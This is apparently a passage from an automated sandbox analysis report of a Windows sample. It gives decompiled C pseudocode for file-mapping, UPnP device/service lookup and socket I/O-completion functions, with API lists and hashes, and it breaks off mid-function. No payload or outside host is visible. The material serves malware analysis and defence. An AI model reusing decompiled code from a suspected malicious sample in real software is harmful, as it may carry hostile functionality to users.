                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9821F974E40208FBDB10DF94CC49FEEB775AB48705F1085A5FA15AB2C0C7B96A44CB65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E004045F0() {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				InitializeCriticalSection(0x416398);
                                                                                                                                                                                                                                                                                    				_t35 = CreateFileW(0x4165c8, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    				_v8 = _t35;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                                                    						return CloseHandle(_v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v16 == 0) {
                                                                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                                                                    						CloseHandle(_v12);
                                                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v20 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                                    					_v24 = _v16;
                                                                                                                                                                                                                                                                                    					while(_v20 != 0) {
                                                                                                                                                                                                                                                                                    						if(_v20 >= 0x100) {
                                                                                                                                                                                                                                                                                    							_t45 = E0040B210(_v24, _v24);
                                                                                                                                                                                                                                                                                    							_t67 = _t66 + 4;
                                                                                                                                                                                                                                                                                    							_v28 = _t45;
                                                                                                                                                                                                                                                                                    							if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    								_v20 = _v20 - 0x100;
                                                                                                                                                                                                                                                                                    								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                                                                                                                                                                                                                    									E004044E0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                                                                                                                                                                                                                    									_t66 = _t67 + 0x10;
                                                                                                                                                                                                                                                                                    									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								E00408C70(_v28);
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					UnmapViewOfFile(_v16);
                                                                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t35;
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x004045fb
                                                                                                                                                                                                                                                                                    0x00404615
                                                                                                                                                                                                                                                                                    0x0040461b
                                                                                                                                                                                                                                                                                    0x00404622
                                                                                                                                                                                                                                                                                    0x0040463c
                                                                                                                                                                                                                                                                                    0x00404643
                                                                                                                                                                                                                                                                                    0x0040470b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040470f
                                                                                                                                                                                                                                                                                    0x0040465b
                                                                                                                                                                                                                                                                                    0x00404662
                                                                                                                                                                                                                                                                                    0x00404701
                                                                                                                                                                                                                                                                                    0x00404705
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404705
                                                                                                                                                                                                                                                                                    0x00404674
                                                                                                                                                                                                                                                                                    0x0040467a
                                                                                                                                                                                                                                                                                    0x0040467d
                                                                                                                                                                                                                                                                                    0x0040468a
                                                                                                                                                                                                                                                                                    0x00404692
                                                                                                                                                                                                                                                                                    0x00404697
                                                                                                                                                                                                                                                                                    0x0040469a
                                                                                                                                                                                                                                                                                    0x004046a1
                                                                                                                                                                                                                                                                                    0x004046ae
                                                                                                                                                                                                                                                                                    0x004046ba
                                                                                                                                                                                                                                                                                    0x004046e1
                                                                                                                                                                                                                                                                                    0x004046e6
                                                                                                                                                                                                                                                                                    0x004046f2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046f2
                                                                                                                                                                                                                                                                                    0x004046c0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046c5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046a3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040468c
                                                                                                                                                                                                                                                                                    0x004046fb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046fb
                                                                                                                                                                                                                                                                                    0x00404718

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00416398,?,?,?,?,?,00406523), ref: 004045FB
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(004165C8,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00404615
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404636
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404655
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040466E
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 004046FB
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00404705
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040470F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3956458805-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ed756388b1b0d6878a7a18186645e736ddd6a16e139f12393ac249dc04bab315
                                                                                                                                                                                                                                                                                    • Instruction ID: fde0418914d6c461a92172338520ab8504d9313cab43c149491a54f3197792e7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed756388b1b0d6878a7a18186645e736ddd6a16e139f12393ac249dc04bab315
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 063145B4D40209FFDB14DBE4CC49FAEB774AB89704F208969E601772C0D7B96541CB59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                                                                                                                                    			E0040C8E0(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				WCHAR* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				WCHAR* _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v20);
                                                                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                                                                    						_push(_a4);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v24);
                                                                                                                                                                                                                                                                                    							_push(_v20);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                                                                                                                                                                                                                    									_t65 = E0040C200(_v20, L"deviceType");
                                                                                                                                                                                                                                                                                    									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                                    									_v28 = _t65;
                                                                                                                                                                                                                                                                                    									if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    										_v32 = 0;
                                                                                                                                                                                                                                                                                    										_push( &_v32);
                                                                                                                                                                                                                                                                                    										_push(_v28);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                                    												_v12 = _v20;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__imp__#6(_v24);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L22:
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040c8e6
                                                                                                                                                                                                                                                                                    0x0040c8ed
                                                                                                                                                                                                                                                                                    0x0040c8f7
                                                                                                                                                                                                                                                                                    0x0040c900
                                                                                                                                                                                                                                                                                    0x0040c908
                                                                                                                                                                                                                                                                                    0x0040c918
                                                                                                                                                                                                                                                                                    0x0040c92a
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c940
                                                                                                                                                                                                                                                                                    0x0040c944
                                                                                                                                                                                                                                                                                    0x0040c94d
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca33
                                                                                                                                                                                                                                                                                    0x0040c927
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c96f
                                                                                                                                                                                                                                                                                    0x0040c978
                                                                                                                                                                                                                                                                                    0x0040c983
                                                                                                                                                                                                                                                                                    0x0040c9a4
                                                                                                                                                                                                                                                                                    0x0040c9af
                                                                                                                                                                                                                                                                                    0x0040c9b4
                                                                                                                                                                                                                                                                                    0x0040c9b7
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9ca
                                                                                                                                                                                                                                                                                    0x0040c9d3
                                                                                                                                                                                                                                                                                    0x0040c9db
                                                                                                                                                                                                                                                                                    0x0040c9f3
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ca23
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040c92a
                                                                                                                                                                                                                                                                                    0x0040ca38
                                                                                                                                                                                                                                                                                    0x0040ca3e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C99C
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C9FF
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CA17
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                                    • Opcode ID: 165bc14b1495aa1e34f09e783435704cf9eca48613dfae01915159d308c3408b
                                                                                                                                                                                                                                                                                    • Instruction ID: 91ab58cec92addcf45ea7f885c8d98816f20cb839f54337aae792cd6c89d1592
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 165bc14b1495aa1e34f09e783435704cf9eca48613dfae01915159d308c3408b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941E975A0020ADFCB04DF98D894BAFB7B5BF48304F108269E515A7390D778AA85CF95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                                                                                                                                    			E0040C700(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				WCHAR* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				WCHAR* _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v20);
                                                                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                                                                    						_push(_a4);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v24);
                                                                                                                                                                                                                                                                                    							_push(_v20);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                                                                                                                                                                                                                    									_t65 = E0040C200(_v20, L"serviceType");
                                                                                                                                                                                                                                                                                    									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                                    									_v28 = _t65;
                                                                                                                                                                                                                                                                                    									if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    										_v32 = 0;
                                                                                                                                                                                                                                                                                    										_push( &_v32);
                                                                                                                                                                                                                                                                                    										_push(_v28);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                                    												_v12 = _v20;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__imp__#6(_v24);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L22:
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040c706
                                                                                                                                                                                                                                                                                    0x0040c70d
                                                                                                                                                                                                                                                                                    0x0040c717
                                                                                                                                                                                                                                                                                    0x0040c720
                                                                                                                                                                                                                                                                                    0x0040c728
                                                                                                                                                                                                                                                                                    0x0040c738
                                                                                                                                                                                                                                                                                    0x0040c74a
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                                                                                                    0x0040c76d
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c853
                                                                                                                                                                                                                                                                                    0x0040c747
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c78f
                                                                                                                                                                                                                                                                                    0x0040c798
                                                                                                                                                                                                                                                                                    0x0040c7a3
                                                                                                                                                                                                                                                                                    0x0040c7c4
                                                                                                                                                                                                                                                                                    0x0040c7cf
                                                                                                                                                                                                                                                                                    0x0040c7d4
                                                                                                                                                                                                                                                                                    0x0040c7d7
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                                                                    0x0040c7f3
                                                                                                                                                                                                                                                                                    0x0040c7fb
                                                                                                                                                                                                                                                                                    0x0040c813
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c843
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c74a
                                                                                                                                                                                                                                                                                    0x0040c858
                                                                                                                                                                                                                                                                                    0x0040c85e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C7BC
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C80B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C81F
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C837
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                                    • Opcode ID: 4741d0aecfd52b34991c53ee9f419a60a0185f3e41b6d02d04152173c09516f5
                                                                                                                                                                                                                                                                                    • Instruction ID: 7b8bcaea6bed01b8a99884d554dfbf2528ef8f0724b329980c1be25b89f5103a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4741d0aecfd52b34991c53ee9f419a60a0185f3e41b6d02d04152173c09516f5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3641FF75A0020ADFCB04EF98C884BAFB7B5BF48305F108269E515A7390D7789E85CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                    			E0040DF90(intOrPtr __eax, void* _a4) {
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                                                                    				long _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t48;
                                                                                                                                                                                                                                                                                    				long _t49;
                                                                                                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t53 = _a4;
                                                                                                                                                                                                                                                                                    				_t45 = __eax;
                                                                                                                                                                                                                                                                                    				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_t48 = __eax + 0x20;
                                                                                                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t48);
                                                                                                                                                                                                                                                                                    					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                                                                    						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                                                                                                                                                                                                                    							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                                                                                                                                                                                                                    							if(_t20 != 0) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t37 = 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_t48);
                                                                                                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                    						_t49 = E00408B00(0x284);
                                                                                                                                                                                                                                                                                    						_t55 = _t54 + 4;
                                                                                                                                                                                                                                                                                    						if(_t49 == 0) {
                                                                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                                                                    							E00409600(_t53);
                                                                                                                                                                                                                                                                                    							return _t49;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t7 = _t49 + 0x264; // 0x264
                                                                                                                                                                                                                                                                                    							 *_t49 = 0x69636c69;
                                                                                                                                                                                                                                                                                    							 *(_t49 + 0x260) = _t53;
                                                                                                                                                                                                                                                                                    							_a4 = 0x10;
                                                                                                                                                                                                                                                                                    							__imp__#5(_t53, _t7,  &_a4);
                                                                                                                                                                                                                                                                                    							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                                                                                                                                                                                                                    								E00408C70(_t49);
                                                                                                                                                                                                                                                                                    								_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                                    								_t49 = 0;
                                                                                                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t28 = E0040BE60();
                                                                                                                                                                                                                                                                                    								_t13 = _t49 + 4; // 0x4
                                                                                                                                                                                                                                                                                    								InterlockedExchange(_t13, _t28);
                                                                                                                                                                                                                                                                                    								_t14 = _t49 + 0x244; // 0x244
